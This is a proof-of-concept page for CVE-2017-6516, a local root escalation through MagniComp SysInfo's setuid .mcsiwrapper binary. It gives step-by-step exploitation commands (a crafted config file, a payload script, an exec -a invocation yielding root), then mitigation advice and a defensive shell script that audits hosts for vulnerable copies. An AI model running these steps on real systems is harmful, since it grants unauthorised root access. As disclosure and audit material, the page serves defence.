
CVE-2017-6516 PoC — MagniComp Sysinfo permission and access control vulnerability

Associated Vulnerability

Title: MagniComp Sysinfo permission and access control vulnerability (CVE-2017-6516)

Description: A Local Privilege Escalation Vulnerability in MagniComp's Sysinfo before 10-H64 for Linux and UNIX platforms could allow a local attacker to gain elevated privileges. Parts of SysInfo require setuid-to-root access in order to access restricted system files and make restricted kernel calls. This access could be exploited by a local attacker to gain a root shell prompt using the right combination of environment variables and command line arguments.

Description

A PoC / methodology to exploit CVE-2017-6516

Readme
# CVE-2017-6516

CVE-2017-6516 is a privilege escalation vulnerability that targets the `.mcsiwrapper` binary from MagniComp SysInfo in versions before 10-H64. When this binary has the SUID bit set and is outdated, a user may execute arbitrary code as the owner of the binary, which is often `root`.

## Requirements

- The binary `.mcsiwrapper` must be setuid:
```bash
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
```
- The binary `.mcsiwrapper` must be older than version 10-H64:
```bash
$ .mcsiwrapper --version
<Version under 10-H64>
```

## Exploitation
Create a file `config` with the following contents:
```bash
ExecPath=<Path to a writeable directory>
```

Create a payload executable file in the `ExecPath` directory, for instance:
```bash
#!/bin/sh
whoami
```
And make it executable:
```bash
$ chmod +x payload
```

Run the command:
```bash
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
```

## Mitigations
Update SysInfo so that `.mcsiwrapper` is version 10-H64 or later.
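
As an added defensive check (not part of this PoC and not MagniComp's own tooling), the following POSIX shell script turns the two requirements above into an audit an administrator can run: it finds setuid files named `.mcsiwrapper`, reads the version each one reports with `--version` (the same check the README uses), and classifies each against the fixed release 10-H64. The version-string shape `<major>-H<build>` and its numeric ordering are an assumption on my part; the advisory itself only names 10-H64, so anything that does not parse is reported as `unknown` rather than silently ignored.

```shell
#!/bin/sh
# Added audit helper for CVE-2017-6516 (not part of the PoC or of MagniComp's
# code). Finds setuid copies of .mcsiwrapper and compares the version they
# report against the fixed release 10-H64.
#
# Assumption (not stated by the advisory): version strings look like
# "<major>-H<build>", e.g. 10-H63 or 10-H64, and order numerically by major,
# then build. Anything else is reported as "unknown" for manual review.

# is_setuid_mode MODE -- MODE is an ls -l mode string such as -rwsr-xr-x.
# Returns 0 when the owner-execute slot carries the setuid flag ('s' or 'S').
is_setuid_mode() {
    case "$1" in
        ???[sS]*) return 0 ;;
        *)        return 1 ;;
    esac
}

# version_at_least_fixed VERSION -- returns 0 if VERSION is 10-H64 or later
# under the assumed "<major>-H<build>" format; 1 otherwise (including unparseable).
version_at_least_fixed() {
    major="${1%%-H*}"
    build="${1#*-H}"
    # Both parts must be plain integers; a string without "-H" fails here.
    case "$major" in ''|*[!0-9]*) return 1 ;; esac
    case "$build" in ''|*[!0-9]*) return 1 ;; esac
    if [ "$major" -gt 10 ]; then
        return 0
    elif [ "$major" -eq 10 ] && [ "$build" -ge 64 ]; then
        return 0
    fi
    return 1
}

# classify MODE VERSION -- prints one word:
#   not-setuid : the binary does not run as its owner, so this PoC does not apply
#   fixed      : setuid, but the version is 10-H64 or later
#   vulnerable : setuid and the version is older than 10-H64
#   unknown    : setuid and the version string was not understood
classify() {
    mode="$1"
    version="$2"
    if ! is_setuid_mode "$mode"; then
        echo not-setuid
    elif version_at_least_fixed "$version"; then
        echo fixed
    else
        # Distinguish a genuinely old version from a string we cannot parse.
        case "$version" in
            [0-9]*-H[0-9]*) echo vulnerable ;;
            *)              echo unknown ;;
        esac
    fi
}

# audit_mcsiwrapper [ROOT] -- walk ROOT (default /) for setuid regular files
# named .mcsiwrapper and print "<verdict> <mode> <path> <version>" per hit.
# The version comes from the binary's own --version output, as in the README.
audit_mcsiwrapper() {
    root="${1:-/}"
    find "$root" -xdev -type f -name .mcsiwrapper -perm -4000 2>/dev/null |
    while IFS= read -r path; do
        mode=$(ls -l "$path" | cut -d' ' -f1)
        version=$("$path" --version 2>/dev/null | head -n 1)
        printf '%s %s %s %s\n' \
            "$(classify "$mode" "$version")" "$mode" "$path" "${version:-?}"
    done
}

# Usage: sh audit-mcsiwrapper.sh /opt   (runs the audit only when a root is given)
[ $# -eq 0 ] || audit_mcsiwrapper "$1"
```

Any line whose verdict is `vulnerable` or `unknown` is a host where the update in the Mitigations section has not been confirmed; `not-setuid` entries are copies that cannot be abused through this PoC, since the whole issue rests on the binary running as its owner.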